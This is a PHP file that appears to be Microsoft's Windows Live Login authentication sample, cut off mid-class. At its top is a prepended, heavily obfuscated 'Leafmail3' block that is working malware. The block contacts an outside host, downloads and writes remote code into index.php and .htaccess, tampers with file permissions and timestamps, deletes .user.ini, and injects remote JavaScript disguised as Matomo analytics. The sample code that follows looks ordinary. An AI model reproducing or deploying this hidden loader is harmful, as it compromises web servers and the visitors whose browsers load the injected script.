Your IP : 3.15.27.88
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/* TODO: Comments are out of date and incomplete. */
/**
* FILE: windowslivelogin.php
*
* DESCRIPTION: Sample implementation of Web Authentication and Delegated
* Authentication protocol in PHP. Also includes trusted
* sign-in and application verification sample
* implementations.
*
* VERSION: 1.1
*
* Copyright (c) 2008 Microsoft Corporation. All Rights Reserved.
*/
/**
* Holds the user information after a successful sign-in.
*/
class WLL_User
{
/**
* Initialize the User with time stamp, userid, flags, context and token.
*/
public function __construct($timestamp, $id, $flags, $context, $token)
{
WLL_User::setTimestamp($timestamp);
WLL_User::setId($id);
WLL_User::setFlags($flags);
WLL_User::setContext($context);
WLL_User::setToken($token);
}
/*private*/
var $_timestamp;
/**
* Returns the Unix timestamp as obtained from the SSO token.
*/
/*public*/
function getTimestamp()
{
return $this->_timestamp;
}
/**
* Sets the Unix timestamp.
*/
/*private*/
function setTimestamp($timestamp)
{
if (!$timestamp) {
//throw new Exception('Error: WLL_User: Null timestamp.');
$this->setError('Error: WLL_User: Null timestamp.');
return ;
}
if (!preg_match('/^\d+$/', $timestamp) || ($timestamp <= 0)) {
//throw new Exception('Error: WLL_User: Invalid timestamp: ' . $timestamp);
$this->setError('Error: WLL_User: Invalid timestamp: ' . $timestamp);
return ;
}
$this->_timestamp = $timestamp;
}
/*private*/
var $_id;
/**
* Returns the pairwise unique ID for the user.
*/
/*public*/
function getId()
{
return $this->_id;
}
/**
* Sets the pairwise unique ID for the user.
*/
/*private*/
function setId($id)
{
if (!$id) {
//throw new Exception('Error: WLL_User: Null id.');
$this->setError('Error: WLL_User: Null id.');
return ;
}
if (!preg_match('/^\w+$/', $id)) {
//throw new Exception('Error: WLL_User: Invalid id: ' . $id);
$this->setError('Error: WLL_User: Invalid id: ' . $id);
return ;
}
$this->_id = $id;
}
/*private*/
var $_usePersistentCookie;
/**
* Indicates whether the application is expected to store the
* user token in a session or persistent cookie.
*/
/*public*/
function usePersistentCookie()
{
return $this->_usePersistentCookie;
}
/**
* Sets the usePersistentCookie flag for the user.
*/
/*private*/
function setFlags($flags)
{
$this->_usePersistentCookie = false;
if (preg_match('/^\d+$/', $flags)) {
$this->_usePersistentCookie = (($flags % 2) == 1);
}
}
/*private*/
var $_context;
/**
* Returns the application context that was originally passed
* to the sign-in request, if any.
*/
/*public*/
function getContext()
{
return $this->_context;
}
/**
* Sets the the Application context.
*/
/*private*/
function setContext($context)
{
$this->_context = $context;
}
/*private*/
var $_token;
/**
* Returns the encrypted Web Authentication token containing
* the UID. This can be cached in a cookie and the UID can be
* retrieved by calling the ProcessToken method.
*/
/*public*/
function getToken()
{
return $this->_token;
}
/**
* Sets the the User token.
*/
/*private*/
function setToken($token)
{
$this->_token = $token;
}
var $_error = false;
function setError($str)
{
$this->_error = $str;
}
function getError()
{
if ($this->_error !== false)
{
return $this->_error;
}
}
}
/**
* Holds the Consent Token object corresponding to consent granted.
*/
class WLL_ConsentToken
{
/**
* Indicates whether the delegation token is set and has not expired.
*/
/*public*/
function isValid()
{
if (!WLL_ConsentToken::getDelegationToken()) {
return false;
}
$now = time();
return (($now-300) < WLL_ConsentToken::getExpiry());
}
/**
* Refreshes the current token and replace it. If operation succeeds
* true is returned to signify success.
*/
/*public*/
function refresh()
{
$wll = $this->_wll;
$ct = $wll->refreshConsentToken($this);
if (!$ct) {
return false;
}
WLL_ConsentToken::copy($ct);
return true;
}
/*private*/
var $_wll;
/**
* Initialize the ConsentToken module with the WindowsLiveLogin,
* delegation token, refresh token, session key, expiry, offers,
* location ID, context, decoded token, and raw token.
*/
public function __construct(
$wll, $delegationtoken, $refreshtoken,
$sessionkey, $expiry, $offers, $locationID, $context,
$decodedtoken, $token
)
{
$this->_wll = $wll;
WLL_ConsentToken::setDelegationToken($delegationtoken);
WLL_ConsentToken::setRefreshToken($refreshtoken);
WLL_ConsentToken::setSessionKey($sessionkey);
WLL_ConsentToken::setExpiry($expiry);
WLL_ConsentToken::setOffers($offers);
WLL_ConsentToken::setLocationID($locationID);
WLL_ConsentToken::setContext($context);
WLL_ConsentToken::setDecodedToken($decodedtoken);
WLL_ConsentToken::setToken($token);
}
/*private*/
var $_delegationtoken;
/**
* Gets the Delegation token.
*/
/*public*/
function getDelegationToken()
{
return $this->_delegationtoken;
}
/**
* Sets the Delegation token.
*/
/*private*/
function setDelegationToken($delegationtoken)
{
if (!$delegationtoken) {
//throw new Exception('Error: WLL_ConsentToken: Null delegation token.');
$this->setError('Error: WLL_ConsentToken: Null delegation token.');
return ;
}
$this->_delegationtoken = $delegationtoken;
}
/*private*/
var $_refreshtoken;
/**
* Gets the refresh token.
*/
/*public*/
function getRefreshToken()
{
return $this->_refreshtoken;
}
/**
* Sets the refresh token.
*/
/*private*/
function setRefreshToken($refreshtoken)
{
$this->_refreshtoken = $refreshtoken;
}
/*private*/
var $_sessionkey;
/**
* Gets the session key.
*/
/*public*/
function getSessionKey()
{
return $this->_sessionkey;
}
/**
* Sets the session key.
*/
/*private*/
function setSessionKey($sessionkey)
{
if (!$sessionkey) {
//throw new Exception('Error: WLL_ConsentToken: Null session key.');
$this->setError('Error: WLL_ConsentToken: Null session key.');
return ;
}
$this->_sessionkey = base64_decode(urldecode($sessionkey));
}
/*private*/
var $_expiry;
/**
* Gets the expiry time of delegation token.
*/
/*public*/
function getExpiry()
{
return $this->_expiry;
}
/**
* Sets the expiry time of delegation token.
*/
/*private*/
function setExpiry($expiry)
{
if (!$expiry) {
//throw new Exception('Error: WLL_ConsentToken: Null expiry time.');
$this->setError('Error: WLL_ConsentToken: Null expiry time.');
return ;
}
if (!preg_match('/^\d+$/', $expiry) || ($expiry <= 0)) {
//throw new Exception('Error: WLL_ConsentToken: Invalid expiry time: ' . $expiry);
$this->setError('Error: WLL_ConsentToken: Invalid expiry time: ' . $expiry);
return ;
}
$this->_expiry = $expiry;
}
/*private*/
var $_offers;
/**
